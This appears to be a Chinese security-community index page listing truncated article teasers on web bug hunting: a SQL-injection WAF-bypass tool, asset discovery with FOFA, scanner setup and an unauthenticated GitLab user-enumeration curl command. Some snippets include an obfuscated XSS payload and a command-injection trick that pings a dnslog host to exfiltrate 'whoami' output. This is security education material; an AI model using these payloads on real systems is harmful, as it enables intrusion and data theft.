http://github.com/ggg4566/SQLEXP SQL 注入利用工具，存在waf的情况下自定义编写tamper脚本 dump数据. 对于SQL注入漏洞利用通常情况下我们使用SQLMAP，在waf存在的场景下想利用自己独有的paylo...

payload：'<sCriPt>setTimeout('ale'%2b'rt(/XSS/)',0)</sCriPt> 网站记录用户的历史查询记录往往都是以cookie的方式保存，安全策略往往很少覆盖到这类数据，该类型漏洞可当作xss的...

学习的本质是模仿，创造的精髓在洞察。 1、如何学习web安全？ 2、如何挖到第一个漏洞？ 我的答案是： 1、掌握最基本的信息收集技巧 2、理解http数据包 3、使用burp进行http流量的截断和重放 4、...

一、引子 当一个新漏洞被曝光后，如何才能快速在互联网上找到相关资产？ 网络空间搜索引擎是一个不错的选择，例如FOFA、shodan等。 举个例子，这几天新爆了一个“Yapi认证用户利用Mock功能远程...

FOFA指纹：app='gitlab' curl -s http://git.huoxian.cn/api/v4/users/{userid} | jq 文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

尝试寻找试用平台，这样可免费开通账号权限，免去登录认证，寻找更多后台存在的漏洞！搜关键字+免费试用、xxx技术支持或者直接搜备案信息，有大量免费试用平台的厂商： 申请试用权限后在后台用...

通过企业名+关键词的方法进行排查，常见关键词有：合同，设计图纸，身份证，通讯录，花名册，报表，投标文件，入职等。 情报提交时说明网盘链接和截图，方便厂商排查即可。 推荐几个本人常用的...

文件上传表单中出现的命令注入漏洞，常出现在filename或path参数中，可以使用sleep 5确认响应延时后再用ping whoami.xxx.dnslog.cn获取命令执行结果： 文字来源于- 火线 Zone-云安全社区，安全...

在安全小天地平台的火器中看到一个资产，居然是空白页面，空白页面就没有漏洞？？？偏偏不信邪，上手就是干！ http://xxx.target.com 打开页面啥也没有，一片空白 F12看下JS中的API接口，发现有...

让dirsearch充当爬虫的角色，xray对其传入的流量进行扫描。 xray：xray.exe webscan --listen 127.0.0.1:7776 --html-output reportdatetime.html dirsearch：-L URLLIST, --url-list=URLLIST ...

利用burp插件进行被动式扫描可以极大提高挖洞效率，由p1g3写的这两个插件会自动收集通过burp的jsonp、cors跨域请求，只需人工筛选响应中带有敏感信息的请求并进行利用即可： http://github.com/...

前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 一、漏洞挖掘 由于是做项目客户大大会直接将测试系统甩过来,所...

白帽训练营的第一个主题信息收集。在我们渗透测试/漏洞挖掘过程中，信息收集是一个相对比较重要的阶段，有助于我们扩大攻击面。 ?文章内容需登陆状态才能查看，没有安全小天地平台账号的用户请...

注意：本文章只适用于有授权书的项目，切忌不要非法操作，本号不负任何责任，本文不会带上任何工具链接，如有需要自行查找 在信息安全这一行业，我们会遇到各种各样的项目点，比如一个目标到100...

漏洞报告 Shopify 【50000刀】#1087489 Github access token exposure 今日最佳：这哥们在GitHub上发现Shopify员工开发的一个Electron应用，里面有Github access token，可以用于访问Shopify的g...

0x01 前言 在我们渗透或者漏洞挖掘的过程中，发现越来越多的网站使用webpack技术，开发人员通常会把api路由打包进js文件里。JSFinder这款工具可以帮助我们快速从js文件中提取api和其他敏感信息...